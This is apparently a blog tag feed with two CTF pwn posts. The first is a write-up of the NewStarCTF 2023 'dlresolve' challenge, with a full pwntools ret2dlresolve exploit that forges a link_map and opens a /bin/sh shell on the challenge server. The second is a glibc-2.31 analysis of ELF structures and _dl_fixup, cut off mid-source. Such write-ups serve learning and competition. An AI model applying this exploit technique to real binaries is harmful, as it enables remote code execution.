Ret2dlresolve on RatherHard の Bloghttps://blog.ratherhard.com/tags/ret2dlresolve/Recent content in Ret2dlresolve on RatherHard の BlogHugo -- gohugo.iozh-CNMon, 27 Apr 2026 16:14:59 +0800BUUCTF-NewStarCTF-2023-dlresolve 题解https://blog.ratherhard.com/post/ctf-pwn/buuctf/newstarctf-2023-dlresolve/Mon, 09 Feb 2026 16:54:00 +0000https://blog.ratherhard.com/post/ctf-pwn/buuctf/newstarctf-2023-dlresolve/<img src="https://blog.ratherhard.com/" alt="Featured image of post BUUCTF-NewStarCTF-2023-dlresolve 题解" /><h3 id="题目">题目 </h3><p><a class="link" href="https://buuoj.cn/challenges#[NewStarCTF%202023%20%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93]dlresolve" target="_blank" rel="noopener" >题目链接</a></p> <h3 id="攻击思路">攻击思路 </h3><p>64 位下 ret2dlresolve 模板题</p> <p>注意将返回地址覆盖为 plt 内容后可再接返回地址控制程序流程</p> <p>注意 _dl_runtime_resolve 有点像 srop 会还原寄存器</p> <h3 id="exp">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./pwn_patched&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;node5.buuoj.cn&#39;</span><span class="p">,</span> <span class="mi">28062</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">link_map_base</span> <span class="o">=</span> <span class="mh">0x404800</span> </span></span><span class="line"><span class="cl"><span class="n">binsh_addr</span> <span class="o">=</span> <span class="n">link_map_base</span> <span class="o">+</span> <span class="mh">0x28</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">read_plt</span> <span class="o">=</span> <span class="mh">0x401060</span> </span></span><span class="line"><span class="cl"><span class="n">again_addr</span> <span class="o">=</span> <span class="mh">0x401192</span> </span></span><span class="line"><span class="cl"><span class="n">plt0_addr</span> <span class="o">=</span> <span class="mh">0x401026</span> </span></span><span class="line"><span class="cl"><span class="n">read_got</span> <span class="o">=</span> <span class="mh">0x404020</span> </span></span><span class="line"><span class="cl"><span class="n">pop_rdi_ret</span> <span class="o">=</span> <span class="mh">0x40115E</span> </span></span><span class="line"><span class="cl"><span class="n">pop_rsi_ret</span> <span class="o">=</span> <span class="mh">0x40116B</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">fake_link_map_gen</span><span class="p">(</span><span class="n">fake_link_map_base</span><span class="p">,</span> <span class="n">delta</span><span class="p">,</span> <span class="n">func_got_addr</span><span class="p">,</span> <span class="n">mstr</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">delta</span><span class="p">,</span> <span class="n">sign</span> <span class="o">=</span> <span class="s1">&#39;signed&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">func_got_addr</span> <span class="o">-</span> <span class="mi">8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">fake_link_map_base</span> <span class="o">+</span> <span class="mi">24</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">fake_link_map_base</span> <span class="o">-</span> <span class="n">delta</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">7</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">mstr</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">=</span> <span class="n">fake_link_map</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x68</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">fake_link_map_base</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">fake_link_map_base</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">=</span> <span class="n">fake_link_map</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0xF8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_link_map</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">fake_link_map_base</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">fake_link_map</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x70</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rsi_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">link_map_base</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">read_plt</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">binsh_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">plt0_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">link_map_base</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x100</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">fake_link_map_gen</span><span class="p">(</span><span class="n">link_map_base</span><span class="p">,</span> <span class="mh">0x52290</span> <span class="o">-</span> <span class="mh">0x10dfc0</span><span class="p">,</span> <span class="n">read_got</span><span class="p">,</span> <span class="s1">&#39;/bin/sh</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x100</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div>glibc-2.31 ret2dlresolve 分析https://blog.ratherhard.com/post/ctf-pwn/analyse/glibc2.31-ret2dlresolve/Sun, 08 Feb 2026 01:00:00 +0000https://blog.ratherhard.com/post/ctf-pwn/analyse/glibc2.31-ret2dlresolve/<img src="https://blog.ratherhard.com/" alt="Featured image of post glibc-2.31 ret2dlresolve 分析" /><h2 id="重要结构">重要结构 </h2><h3 id="link_map">link_map </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">link_map</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="cm">/* These first few members are part of the protocol with the debugger. </span></span></span><span class="line"><span class="cl"><span class="cm"> This is the same format used in SVR4. */</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Addr</span><span class="p">)</span> <span class="n">l_addr</span><span class="p">;</span> <span class="cm">/* Difference between the address in the ELF </span></span></span><span class="line"><span class="cl"><span class="cm"> file and the addresses in memory. */</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">l_name</span><span class="p">;</span> <span class="cm">/* Absolute file name object was found in. */</span> </span></span><span class="line"><span class="cl"> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Dyn</span><span class="p">)</span> <span class="o">*</span><span class="n">l_ld</span><span class="p">;</span> <span class="cm">/* Dynamic section of the shared object. */</span> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">link_map</span> <span class="o">*</span><span class="n">l_next</span><span class="p">,</span> <span class="o">*</span><span class="n">l_prev</span><span class="p">;</span> <span class="cm">/* Chain of loaded objects. */</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* All following members are internal to the dynamic linker. </span></span></span><span class="line"><span class="cl"><span class="cm"> They may change without notice. */</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* This is an element which is only ever different from a pointer to </span></span></span><span class="line"><span class="cl"><span class="cm"> the very same copy of this type for ld.so when it is used in more </span></span></span><span class="line"><span class="cl"><span class="cm"> than one namespace. */</span> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">link_map</span> <span class="o">*</span><span class="n">l_real</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* Number of the namespace this link map belongs to. */</span> </span></span><span class="line"><span class="cl"> <span class="n">Lmid_t</span> <span class="n">l_ns</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">libname_list</span> <span class="o">*</span><span class="n">l_libname</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="cm">/* Indexed pointers to dynamic section. </span></span></span><span class="line"><span class="cl"><span class="cm"> [0,DT_NUM) are indexed by the processor-independent tags. </span></span></span><span class="line"><span class="cl"><span class="cm"> [DT_NUM,DT_NUM+DT_THISPROCNUM) are indexed by the tag minus DT_LOPROC. </span></span></span><span class="line"><span class="cl"><span class="cm"> [DT_NUM+DT_THISPROCNUM,DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM) are </span></span></span><span class="line"><span class="cl"><span class="cm"> indexed by DT_VERSIONTAGIDX(tagvalue). </span></span></span><span class="line"><span class="cl"><span class="cm"> [DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM, </span></span></span><span class="line"><span class="cl"><span class="cm"> DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM) are indexed by </span></span></span><span class="line"><span class="cl"><span class="cm"> DT_EXTRATAGIDX(tagvalue). </span></span></span><span class="line"><span class="cl"><span class="cm"> [DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM, </span></span></span><span class="line"><span class="cl"><span class="cm"> DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM) are </span></span></span><span class="line"><span class="cl"><span class="cm"> indexed by DT_VALTAGIDX(tagvalue) and </span></span></span><span class="line"><span class="cl"><span class="cm"> [DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM, </span></span></span><span class="line"><span class="cl"><span class="cm"> DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM+DT_ADDRNUM) </span></span></span><span class="line"><span class="cl"><span class="cm"> are indexed by DT_ADDRTAGIDX(tagvalue), see &lt;elf.h&gt;. */</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Dyn</span><span class="p">)</span> <span class="o">*</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_NUM</span> <span class="o">+</span> <span class="n">DT_THISPROCNUM</span> <span class="o">+</span> <span class="n">DT_VERSIONTAGNUM</span> </span></span><span class="line"><span class="cl"> <span class="o">+</span> <span class="n">DT_EXTRANUM</span> <span class="o">+</span> <span class="n">DT_VALNUM</span> <span class="o">+</span> <span class="n">DT_ADDRNUM</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// 后略 </span></span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span></code></pre></td></tr></table> </div> </div><ul> <li><strong>l_addr (uint64_t)</strong> : ELF 文件中定义的地址与内存中实际地址之间的差值 <blockquote> <p>这就是该模块的【基地址 (Base Address)】 对于开启了 PIE 的程序或 .so 库,这里存的是随机化后的基址 对于未开启 PIE (No-PIE) 的主程序,这里通常是 0</p> </blockquote> </li> <li><strong>l_name</strong> : 找到该对象的绝对文件名 <blockquote> <p>这是一个指针,指向存储库文件路径的字符串(例如 &ldquo;/lib/x86_64-linux-gnu/libc.so.6&rdquo;) 对于主程序,这里通常是空字符串</p> </blockquote> </li> <li><strong>l_ld (Elf64_Dyn)</strong> : 该共享对象的动态段(.dynamic section)的地址 <blockquote> <p>指向内存中 .dynamic 段的指针。这个段里存着 DT_STRTAB, DT_SYMTAB 等标签 _dl_fixup 实际上并不直接用这个 l_ld,而是用后面定义的 l_info 数组(它是由 l_ld 解析生成的)</p> </blockquote> </li> <li><strong>l_next, l_prev</strong> : 已加载对象的链表 <blockquote> <p>双向链表指针 l_next 指向下一个加载的库,l_prev 指向上一个 攻击时通常不需要伪造这两个指针,除非你的攻击链涉及遍历这个链表</p> </blockquote> </li> <li><strong>l_real</strong> : 这是一个通常指向它自己的指针 <blockquote> <p>只有当动态链接器(ld.so)在多个命名空间(namespace)中被使用时,这个指针才会指向不同的副本</p> </blockquote> </li> <li><strong>l_ns (8 bytes)</strong> : 该 link map 所属的命名空间编号 <blockquote> <p>Linux 支持多个链接器命名空间(比如 dlmopen 可以加载一个隔离的库) LM_ID_BASE (通常是 0) 表示主程序所在的默认命名空间</p> </blockquote> </li> <li><strong>l_libname</strong> : 指向一个链表,存储了该共享对象的名称(可能有别名,比如 libc.so.6 和 libc-2.31.so)</li> <li><strong>l_info (Elf64_Dyn)</strong> : 指向动态段(dynamic section)条目的指针数组。 <blockquote> <p>[0, DT_NUM) 范围内的元素:使用**处理器无关的标签(Tag)**直接作为下标索引。 [DT_NUM, &hellip;) 范围内的元素:使用 标签值减去 DT_LOPROC 作为下标索引。 [&hellip;] 范围内的元素:使用 DT_VERSIONTAGIDX(tagvalue) 计算出的值作为下标索引。 &hellip;(后面是关于 Extra, Val, Addr 等特殊标签的索引计算方式)。</p> </blockquote> </li> </ul> <h3 id="elf64_dyn">Elf64_Dyn </h3><p>ELF 64位 动态段条目</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">typedef</span> <span class="k">struct</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Sxword</span> <span class="n">d_tag</span><span class="p">;</span> <span class="cm">/* Dynamic entry type */</span> </span></span><span class="line"><span class="cl"> <span class="k">union</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Xword</span> <span class="n">d_val</span><span class="p">;</span> <span class="cm">/* Integer value */</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Addr</span> <span class="n">d_ptr</span><span class="p">;</span> <span class="cm">/* Address value */</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="n">d_un</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="n">Elf64_Dyn</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><ul> <li><strong>d_tag (int64_t)</strong> : 这是“类型标签”,用来告诉链接器后面那个 d_un 存的是什么东西 <blockquote> <p>DT_NULL (0): 标记动态段的结束 DT_STRTAB (5): 字符串表(String Table)的地址 DT_SYMTAB (6): 符号表(Symbol Table)的地址 DT_JMPREL (23): 重定位表(Relocation Table,即 .rela.plt)的地址</p> </blockquote> </li> <li><strong>d_un.d_val (uint64_t)</strong> : 当标签表示大小或数量时使用(例如 DT_SYMENT 表示符号表每项的大小)</li> <li><strong>d_un.d_ptr (uint64_t)</strong> : 当标签表示地址时使用</li> </ul> <h3 id="elf64_sym">Elf64_Sym </h3><p>ELF 64位 符号表条目</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">typedef</span> <span class="k">struct</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Word</span> <span class="n">st_name</span><span class="p">;</span> <span class="cm">/* Symbol name (string tbl index) */</span> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">st_info</span><span class="p">;</span> <span class="cm">/* Symbol type and binding */</span> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">st_other</span><span class="p">;</span> <span class="cm">/* Symbol visibility */</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Section</span> <span class="n">st_shndx</span><span class="p">;</span> <span class="cm">/* Section index */</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Addr</span> <span class="n">st_value</span><span class="p">;</span> <span class="cm">/* Symbol value */</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Xword</span> <span class="n">st_size</span><span class="p">;</span> <span class="cm">/* Symbol size */</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="n">Elf64_Sym</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><ul> <li><strong>st_name (uint32_t)</strong> : 指向字符串表(String Table, DT_STRTAB)的相对偏移 <blockquote> <p>函数名地址 = DT_STRTAB 基址 + st_name</p> </blockquote> </li> <li><strong>st_info</strong> : 这 1 个字节包含了两个信息 <blockquote> <p>高 4 位 (Bind): 绑定属性(Global, Local, Weak) 低 4 位 (Type): 符号类型(Object, Func, None) 常见值:0x12:即 STB_GLOBAL (1) &laquo; 4 | STT_FUNC (2) ,表示这是一个全局函数</p> </blockquote> </li> <li><strong>st_other</strong> : 符号的可见性 <blockquote> <p>STV_DEFAULT (0): 默认可见性(通常是公开的,可被外部链接) STV_INTERNAL (1): 处理器特定的隐藏类型(很少用) STV_HIDDEN (2): 符号在模块内可见,外部不可见(即使是全局符号) STV_PROTECTED (3): 符号可见,但不能被抢占(Preempted)</p> </blockquote> </li> <li><strong>st_shndx (uint16_t)</strong> : 该符号定义在哪个节(Section)里,它是一个索引值,指向 Section Header Table <blockquote> <p>几个特殊的保留索引值: SHN_UNDEF (0): 未定义符号,表示该符号在本模块中被引用,但定义在其他模块(如 libc.so)中 SHN_ABS (0xfff1): 绝对符号,该符号的值是绝对地址,不随重定位改变 SHN_COMMON (0xfff2): 通用块符号(通常用于未初始化的全局变量)</p> </blockquote> </li> <li><strong>st_value (uint64_t)</strong> : 符号的值(通常是地址) <blockquote> <p>在可重定位文件 (.o) 中:它是相对于所在节(Section)的偏移量 在可执行文件或共享库 (.so) 中: 如果符号已定义(st_shndx != 0):它是符号的虚拟地址(Virtual Address) 如果符号未定义(st_shndx == 0):通常为 0 ,但如果是对齐的 Common 符号,它表示对齐约束</p> </blockquote> </li> <li><strong>st_size (uint64_t)</strong> : 函数或变量的大小</li> </ul> <h3 id="elf64_rela">Elf64_Rela </h3><p>ELF 64位 重定位条目</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">typedef</span> <span class="k">struct</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Addr</span> <span class="n">r_offset</span><span class="p">;</span> <span class="cm">/* Address */</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Xword</span> <span class="n">r_info</span><span class="p">;</span> <span class="cm">/* Relocation type and symbol index */</span> </span></span><span class="line"><span class="cl"> <span class="n">Elf64_Sxword</span> <span class="n">r_addend</span><span class="p">;</span> <span class="cm">/* Addend */</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="n">Elf64_Rela</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><ul> <li><strong>r_offset</strong> : 修正地址,即动态链接器解析出函数的真实地址后,应该把这个地址写到哪里去 <blockquote> <p>指向 GOT 表(Global Offset Table)中的某个条目</p> </blockquote> </li> <li><strong>r_info</strong> : 这是一个复合字段,高 32 位和低 32 位分别代表不同含义 <blockquote> <p>r_info = (Symbol Index &laquo; 32) + Relocation Type 高 32 位:Symbol Index (符号表索引) 告诉链接器:“去符号表(Symbol Table)的第几个条目找这个函数的信息” 低 32 位:Relocation Type (重定位类型) 告诉链接器如何进行重定位 7 即 R_X86_64_JUMP_SLOT</p> </blockquote> </li> <li><strong>r_addend</strong> : 加数,用于计算最终值的常数偏移 <blockquote> <p>最终值 = Symbol Value + Addend</p> </blockquote> </li> </ul> <h2 id="_dl_fixup-源码分析">_dl_fixup 源码分析 </h2><h3 id="_dl_fixup-源码">_dl_fixup 源码 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span><span class="lnt">91 </span><span class="lnt">92 </span><span class="lnt">93 </span><span class="lnt">94 </span><span class="lnt">95 </span><span class="lnt">96 </span><span class="lnt">97 </span><span class="lnt">98 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cm">/* This function is called through a special trampoline from the PLT the 